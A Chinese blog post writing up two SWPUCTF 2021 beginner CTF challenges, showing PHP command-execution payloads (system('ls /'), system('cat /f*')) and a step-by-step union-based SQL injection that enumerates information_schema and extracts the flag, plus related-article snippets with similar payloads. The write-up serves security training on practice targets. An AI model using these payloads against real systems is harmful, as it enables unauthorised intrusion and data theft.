[SWPUCTF 2021 新生赛]easyrce

最新推荐文章于 2024-05-11 09:11:03 发布
最新推荐文章于 2024-05-11 09:11:03 发布
阅读量3.1k 收藏 6
点赞数 3
文章标签: sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/124674234
版权

SQL注入 CTF挑战 漏洞检测 数据库 信息获取
关键词由CSDN通过智能技术生成

打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录

 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag

1: ?url=system("cat /f*");

2\?url=system("cat /flllllaaaaaaggggggg");

[SWPUCTF 2021 新生赛]easy_sql

打开界面属实给我整不会了。

1.然后测一下是否存在sql漏洞,因为题目中说了参数是wllm,首先输入一下?wllm=1回显正常,然后试一下?wllm=1'然后出现错误,所以判断存在字符型漏洞,

2.测试一下字段列数,?wllm=1' order by 3--+,?wllm=1' order by 4--+出错所以为三列

3.        ?wllm=1' union select 1,database(),3 --+ 看一下回显位置顺便查询数据库名称,结果却一直不对,我想了半天才发现wllm=-1'这样前面肯定错误才会往后面走,记住就行了,然后查出来数据库名称是

4.进行下一部查询表, ?wllm=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test_db' --+

5.猜测flag在test_tb这个表里面 

?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test_db' and table_name='test_tb' --+

6.最后出现flag,然后?wllm=-1’ union select 1,database(),flag from test_tb --+或者?wllm=-1' union select 1,flag,3 from test_tb --+

就得出了答案Your Login name:NSSCTF{17cff774-19ac-4227-bb53-29e6e97ca767}

 

偶尔躲躲乌云334
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 723
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]traditional
03-15
SWPUCTF 2021 新生的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
11.14[SWPUCTF 2021 新生]easyrce已解决题目
plm20030621的博客
11-14 75
第一步, 看到get 传参优先是想到一些get 传参的用法,但在这里,依旧涉及Liunx的一些操作指令,第二步,使用ls 命令去查看当前下有那些文件,做到这里,你已经成功一半了。第三步,cat 查询的命令 得到flag值。用于打印当前有效的用户名称,相当于执行。先用此命令查看自己的用户和权限。
NSSCTF刷题笔记web5——[SWPUCTF 2021 新生]easyrce
qq_45692883的博客
01-18 400
没有做过滤,传入的url的值 直接当做php代码执行。代码还是那么的朴实无华,我愿称之为真正的easy。
NSSCTF | [SWPUCTF 2021 新生]easyrce
最新发布
2302_80946742的博客
05-11 191
然后cat命令查看flllllaaaaaaggggggg文件中的内容就可以得到flag。这是一道很简单的RCE(远程命令执行),打开题目后可以看到一个php脚本。可以看到,system函数是可以使用的,使用ls命令正常回显了目录下的文件。直接传入url参数就可以执行相应的命令,先用system函数试试。这题也可以使用蚁剑直接连接就能查看目录,从而得到flag。那么我们看看根目录里面有什么。
[SWPUCTF 2021 新生]easy_sql
qq_56301349的博客
07-15 3826
[SWPUCTF 2021 新生]easy_sql
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 564
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
error message_errormessage_
10-04
在IT行业中,错误处理是软件开发中的重要环节,它确保了程序在遇到问题时能够以适当的方式响应,提供用户友好的反馈。"error message_errormessage_" 这个标题可能是指一个特定的错误处理机制或者函数,其核心是创建...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 908
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
SWPUCTF 2021 新生]easy_sql
mcw_ai_biancheng的博客
02-19 410
1,2,3--+查看回显。
[SWPUCTF 2021 新生]easy_sql做题过程
heliar的博客
01-27 295
wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表。wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。查看得知回显为wllm,试输入?
[SWPUCTF 2021 新生]caidao
rev1ve的博客
03-05 1088
[SWPUCTF 2021 新生]caidao
CTF刷题记录(一)
m0_63441547的博客
06-15 245
把这个对象当成了字符串,所以调用了 day 类的 __toString() 方法,然后再调用 dark 类里的 go() 方法,然后在 go() 方法里把这个对象当成了方法使用,所以就去调用了 light 类的 __invoke 方法,又因为在 __invoke 方法里再次调用了一个不存在的 d() 方法,接着就会去调用 day 类里的 __call 方法,最后去调用 dark 类里的 getFlag() 方法。输出结果:O:5:"night":1:{s:5:"night";简单构造,有过滤,不行。
BUUCTF [羊城杯 2020]easyre 题解
OrientalGlass的博客
03-08 979
对数字和字母移三位,其他特殊字符不变,要求出加密前的字符串,只需要对数字+7再mod10,对字母+23再mod26,有点补码的感觉在。看到主函数的str2大概就可以猜到是base64,ctrl+f12也可以看到存在base64表。进入该函数后大概看一下不难发现是base64加密并且这题没有换表操作。第三次加密是将code2内的数字和字母移3位,其他字符不变。第一次加密是base64加密,得到code1。三.encode_one_base64。五.encode_three。四.encode_two。
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,以及一些特定的符号。如果wllm中包含了这些被过滤的字符,脚本会输出"LTLT说不能用这些奇奇怪怪的符号哦!"。接着,脚本会检查wllm中是否包含字母,如果包含字母,脚本会输出"Ra's Al Ghul说不能用字母哦!"。最后,如果wllm通过了所有的过滤条件,脚本会执行eval函数来执行用户传入的代码。所以,要获取flag,需要构造一个满足所有过滤条件的有效代码。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值